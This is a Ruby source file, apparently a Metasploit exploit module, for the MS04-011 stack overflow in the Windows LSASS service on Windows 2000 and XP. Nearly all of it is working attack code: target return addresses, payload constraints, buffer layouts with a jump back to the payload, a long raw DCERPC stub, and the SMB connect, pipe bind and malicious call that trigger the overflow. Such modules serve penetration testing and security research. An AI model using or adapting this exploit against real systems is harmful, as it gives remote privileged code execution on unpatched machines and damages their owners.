229 lines
8.7 KiB
Ruby
229 lines
8.7 KiB
Ruby
require 'msf/core'
|
|
|
|
module Msf
|
|
|
|
class Exploits::Windows::MS04_011_LSASS < Msf::Exploit::Remote
|
|
|
|
#
|
|
# This module exploits a vulnerability in the LSASS service
|
|
#
|
|
|
|
include Exploit::Remote::DCERPC
|
|
include Exploit::Remote::SMB
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Microsoft LSASS MSO4-011 Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack overflow in the LSASS service, this vulnerability
|
|
was originally found by eEye. When re-exploiting a Windows XP system, you will need
|
|
need to run this module twice. DCERPC request fragmentation can be performed by setting
|
|
'FragSize' parameter.
|
|
},
|
|
'Author' => [ 'hdm' ],
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '5248' ],
|
|
[ 'MSB', 'MS04-011' ],
|
|
[ 'MIL', '36' ],
|
|
],
|
|
'Privileged' => true,
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'thread'
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
|
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
|
|
},
|
|
'Targets' =>
|
|
[
|
|
# Automatic
|
|
[
|
|
'Automatic Targetting',
|
|
{
|
|
'Platform' => 'win',
|
|
'Rets' => [ ],
|
|
},
|
|
],
|
|
# Windows 2000
|
|
[
|
|
'Windows 2000 English',
|
|
{
|
|
'Platform' => 'win',
|
|
'Rets' => [ 0x773242e0 ],
|
|
},
|
|
],
|
|
# Windows XP
|
|
[
|
|
'Windows XP English',
|
|
{
|
|
'Platform' => 'win',
|
|
'Rets' => [ 0x7449bf1a ],
|
|
},
|
|
],
|
|
],
|
|
'DefaultTarget' => 0))
|
|
end
|
|
|
|
def exploit
|
|
#
|
|
# Connect to the remote SMB service
|
|
#
|
|
print_status("Connecting to the target system...")
|
|
connect
|
|
|
|
#
|
|
# Request a session, authenticate, and connect to IPC$
|
|
#
|
|
smb_login
|
|
|
|
|
|
#
|
|
# Check the remote OS name and version
|
|
#
|
|
os = smb_peer_lm
|
|
over =''
|
|
|
|
case os
|
|
|
|
# Windows 2000 requires that the string be unicode formatted
|
|
# and give us a nice set of registers which point back to
|
|
# the un-unicoded data. We simply return to a nop sled that
|
|
# jumps over the return address, some trash, and into the
|
|
# final payload. Easy as pie.
|
|
when /2000/
|
|
str = Rex::Text.rand_text_alphanumeric(3500)
|
|
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
|
str[2104, payload.encoded.length ] = payload.encoded
|
|
over = self.make_lsass_stub_beg + self.unicode(str) + make_lsass_stub_end
|
|
|
|
# Windows XP is a bit different, we need to use an ascii
|
|
# buffer and a jmp esp. The esp register points to an
|
|
# eight byte segment at the end of our buffer in memory,
|
|
# we make these bytes jump back to the beginning of the
|
|
# buffer, giving us about 1936 bytes of space for a
|
|
# payload.
|
|
when /XP/
|
|
str = Rex::Text.rand_text_alphanumeric(7000)
|
|
str[0, payload.encoded.length ] = payload.encoded
|
|
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
|
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
|
over = self.make_lsass_stub_beg + str + make_lsass_stub_end
|
|
when
|
|
print_status("No target is available for #{ os }")
|
|
return
|
|
end
|
|
|
|
|
|
#
|
|
# Open the lsarpc named pipe
|
|
#
|
|
fid = smb_create('\lsarpc')
|
|
|
|
#
|
|
# Bind to LSASS over the LSARPC pipe
|
|
#
|
|
smb_dcerpc_bind(fid, 'LSA_DS')
|
|
|
|
#
|
|
# Send the malicious DCERPC request
|
|
#
|
|
smb_dcerpc_call(fid, 9, over)
|
|
|
|
#
|
|
# Perform any required client-side payload handling
|
|
#
|
|
handler
|
|
|
|
end
|
|
|
|
|
|
def make_lsass_stub_beg
|
|
"\xad\x0d\x00\x00\x00\x00\x00\x00\xad\x0d\x00\x00"
|
|
end
|
|
|
|
def make_lsass_stub_end
|
|
"\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00"+
|
|
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
|
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
|
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
|
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x50\x6a\x40\x00"+
|
|
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"+
|
|
"\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
|
"\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"+
|
|
"\x01\x00\x00\x00\x00\x00\x00\x00\x50\x80\x23\x00\xdf\xaf\xff\x33"+
|
|
"\x9b\x78\x70\x43\xc5\x0a\x4d\x98\x96\x02\x64\x92\xc1\xee\x70\x32"+
|
|
"\x65\xc1\xef\x7b\xd6\xaa\xd6\x09\x21\xf6\xe7\xd1\x4c\xdf\x6a\x2d"+
|
|
"\x0a\xfb\x43\xea\xda\x07\x24\x84\x88\x52\x9e\xa8\xa1\x7f\x4b\x60"+
|
|
"\xec\x94\x57\x33\x06\x93\x92\x25\xd6\xac\xdc\x89\x68\x5e\xbb\x32"+
|
|
"\x2b\x17\x68\xf2\x06\xb7\x86\xac\x81\xfe\x52\x27\xf5\x80\x11\x0d"+
|
|
"\x4e\x2e\x1b\xa3\x44\x8a\x58\xed\xf3\x9c\xe9\x31\x01\x72\xa6\xab"+
|
|
"\xfa\xa8\x05\x00\x37\x60\x6b\x81\xef\xf4\x96\x9a\xf7\x67\x95\x27"+
|
|
"\x7a\x25\xef\x6f\x0e\xff\x2d\x15\x7f\x23\x1c\xa7\x56\x94\x4a\x18"+
|
|
"\x98\xc6\xd8\xd2\x29\x5b\x57\xb8\x5d\x3a\x93\x58\x45\x77\x36\xe3"+
|
|
"\xd1\x36\x87\xff\xe3\x94\x0f\x00\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+
|
|
"\xa3\x25\xce\xd4\xaf\x39\xeb\x17\xcf\x22\x43\xd9\x0c\xce\x37\x86"+
|
|
"\x46\x54\xd6\xce\x00\x30\x36\xae\xf9\xb5\x2b\x11\xa0\xfe\xa3\x4b"+
|
|
"\x2e\x05\xbe\x54\xa9\xd8\xa5\x76\x83\x5b\x63\x01\x1c\xd4\x56\x72"+
|
|
"\xcd\xdc\x4a\x1d\x77\xda\x8a\x9e\xba\xcb\x6c\xe8\x19\x5d\x68\xef"+
|
|
"\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x04\xd9\xda\x4c\x42\x31"+
|
|
"\xd9\xbd\x99\x06\xf7\xa3\x0a\x19\x49\x07\x77\xf0\xdb\x7c\x43\xfa"+
|
|
"\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+
|
|
"\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x54\x6d\xed"+
|
|
"\x53\xf9\x73\xc6\x6e\xa8\xc0\x97\xcf\x56\x3b\x61\xdf\xab\x83\x18"+
|
|
"\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+
|
|
"\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+
|
|
"\xe6\x08\xe6\x2a\x4f\x24\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+
|
|
"\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x6c\x28\x42"+
|
|
"\x07\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\xec\x35\x5e\x98\x71\x50"+
|
|
"\x60\x35\x76\x53\x40\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+
|
|
"\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+
|
|
"\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+
|
|
"\xbc\xe1\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+
|
|
"\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+
|
|
"\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+
|
|
"\xa9\x61\x34\x75\x98\x1e\x05\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+
|
|
"\x89\xfd\x7f\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x3a\x3c\xec\xd9"+
|
|
"\x9b\x8c\x93\x93\x2b\x44\x86\x8b\x80\x83\x23\x00\xdf\xaf\xff\x33"+
|
|
"\x9b\x78\x70\x43\xf1\x55\x87\xb1\xa1\xb3\x8e\x79\x02\x70\x82\x6c"+
|
|
"\x0b\xc1\xef\x96\xf1\xef\xdd\xa2\x69\x86\xc7\x85\x09\x7e\xf0\x2f"+
|
|
"\x8e\xa0\x5f\xea\x39\x2e\x24\xf0\x82\x30\x26\xa8\xa1\x4f\xc6\x5c"+
|
|
"\xec\x94\x87\x52\x9b\x93\x92\xf3\xa3\x1b\xc7\x8f\x9e\xb3\xbb\x32"+
|
|
"\x2b\x17\x54\xf2\x06\x0c\x86\x92\x0f\xb8\xe0\x27\x50\xaa\xeb\xf5"+
|
|
"\x4e\x2b\x1b\xb2\x44\xe6\x58\x02\xd7\x65\xdc\x31\x01\xec\xa6\xab"+
|
|
"\xfa\xa8\x05\x00\x37\x60\x4f\xa1\x3c\x4f\x7a\x9a\x10\x67\x95\xc2"+
|
|
"\x5b\x25\xef\x76\x0e\xff\x2d\x15\x7f\x23\x1c\x77\x56\x94\x4a\x18"+
|
|
"\x98\xc6\xd8\xd2\x29\x44\x57\xb8\x40\x3a\x93\x58\x45\x77\x36\x36"+
|
|
"\x07\x35\x2a\xff\x00\x94\x5c\x80\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+
|
|
"\xbc\xf8\xce\x05\x77\x39\x40\x17\xcf\x63\x43\x77\x27\xce\x37\x86"+
|
|
"\x46\x54\xd6\xce\x00\x30\x36\xae\x9f\x24\x2b\x5a\xa0\xfe\xa3\x4b"+
|
|
"\x2e\x7e\xf7\x54\xa9\xd8\xa5\x76\x83\x7b\x63\x01\x1c\xd4\x56\x17"+
|
|
"\x02\xdc\x4a\x89\x77\xda\x8f\x9e\xba\xcb\x37\xe8\x19\x5d\x68\x38"+
|
|
"\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x5a\xd9\x6d\x4c\x42\x31"+
|
|
"\xd9\xf2\x99\x06\xf7\x0c\x99\xbe\x49\x07\x77\xf0\x8b\x7c\x43\xfa"+
|
|
"\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+
|
|
"\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x98\x6d\xed"+
|
|
"\x53\xf9\x73\xc6\xa5\xa8\xf7\x66\xcf\x56\x3b\x61\xdf\xab\x83\x18"+
|
|
"\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+
|
|
"\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+
|
|
"\xe6\x08\xe6\x2a\x4f\x92\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+
|
|
"\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x5d\x28\x42"+
|
|
"\x34\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\x2b\x35\x5e\x98\x71\x50"+
|
|
"\x2c\x35\x76\x53\x4e\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+
|
|
"\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+
|
|
"\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+
|
|
"\xbc\x77\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+
|
|
"\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+
|
|
"\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+
|
|
"\xa9\x61\x34\x75\x98\x1e\x6f\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+
|
|
"\x89\xfd\x1c\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x79\x26\x46\xf7"+
|
|
"\xbf\xa1\x12\x73\x23\x44\x86\x8b\x50\x6a\x40\x00"
|
|
end
|
|
end
|
|
|
|
end
|